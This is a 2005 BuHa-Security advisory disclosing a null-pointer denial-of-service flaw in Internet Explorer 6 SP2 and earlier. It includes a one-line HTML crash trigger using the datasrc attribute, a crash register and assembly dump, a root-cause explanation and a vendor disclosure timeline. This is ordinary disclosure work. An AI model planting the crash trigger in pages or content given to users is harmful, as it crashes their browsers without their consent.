[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #1
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
---------------------------------------------------
| BuHa Security-Advisory #4 | Dec 24th, 2005 |
---------------------------------------------------
| Vendor | M$ Internet Explorer 6.0 |
| URL | http://www.microsoft.com/windows/ie/ |
| Version | <= 6.0.2900.2180.xpsp_sp2 |
| Risk | Low (DoS - Null Pointer Dereference) |
---------------------------------------------------
o Description:
=============
Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.
Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.
o Denial of Service: <mshtml.dll>#7d663471
===================
Following HTML code forces M$ IE 6 to crash:
> <table datasrc=".">
Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1128216821765-7d663471.html
These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=01293b38 ecx=01293b20 edx=7d74ede0 esi=01293b20
edi=00000000 eip=7d663471 esp=0012e89c ebp=0012e89c
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
7d663469 8bff mov edi,edi
7d66346b 55 push ebp
7d66346c 8bec mov ebp,esp
7d66346e 8b4110 mov eax,[ecx+0x10]
FAULT ->7d663471 66833823 cmp word ptr [eax],0x23
ds:0023:00000000=????
7d663475 7405 jz mshtml+0x1b347c (7d66347c)
7d663477 33c0 xor eax,eax
7d663479 40 inc eax
7d66347a eb1e jmp mshtml+0x1b349a (7d66349a)
7d66347c ff7508 push dword ptr [ebp+0x8]
7d66347f 8b09 mov ecx,[ecx]
7d663481 83c002 add eax,0x2
7d663484 50 push eax
7d663485 e8466cebff call mshtml+0x6a0d0 (7d51a0d0)
7d66348a 8bc8 mov ecx,eax
7d66348c e8ad44fbff call mshtml!CreateHTMLPropertyPage+0x2432c
(7d61793e)
7d663491 33c9 xor ecx,ecx
7d663493 85c0 test eax,eax
7d663495 0f9cc1 setl cl
7d663498 8bc1 mov eax,ecx
7d66349a 5d pop ebp
7d66349b c20400 ret 0x4
The access violation results in a null pointer dereference and is not
exploitable.
M$ IE parses the attribute value of 'datasrc' ("[n].[m]") in the
following way:
* Split the attribute value in two parts
* Compare the first char of [n] with 0x23 ('#')
The reason for the crash is that the 0 byte long [n] (no memory is allocated
for this string) is used without any validation.
For example:
> char *t = NULL;
>
> if(t[0] = 0x23)
o Vulnerable versions:
=====================
The DoS vulnerability was successfully tested on:
> M$ IE 6.0 - Windoze XP Pro SP2
> M$ IE 6.0 - Windoze 2k SP4
> M$ IE 5.5 - Windoze XP Pro SP2
> M$ IE 5.01 - Windoze XP Pro SP2
o Disclosure Timeline:
=====================
10 Oct 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.
o Solution:
==========
There is no patch yet. The vulnerability will be fixed in an upcoming
service pack according to the Microsoft Security Response Center.
o Credits:
=========
Christian Deneke <bugtraq@xxxxxxxxxx>
- --
Thomas Waldegger <bugtraq@xxxxxxxxxxxx>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.
Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.
Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-1.txt
-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/
iD8DBQFDrdnDkCo6/ctnOpYRAvLLAKCbjmd+eqqRXDbtfjqNj4ALvJz2aACeM2ZS
i7x/RPte39BmMXHPNZUn2iU=
=6FEe
-----END PGP SIGNATURE-----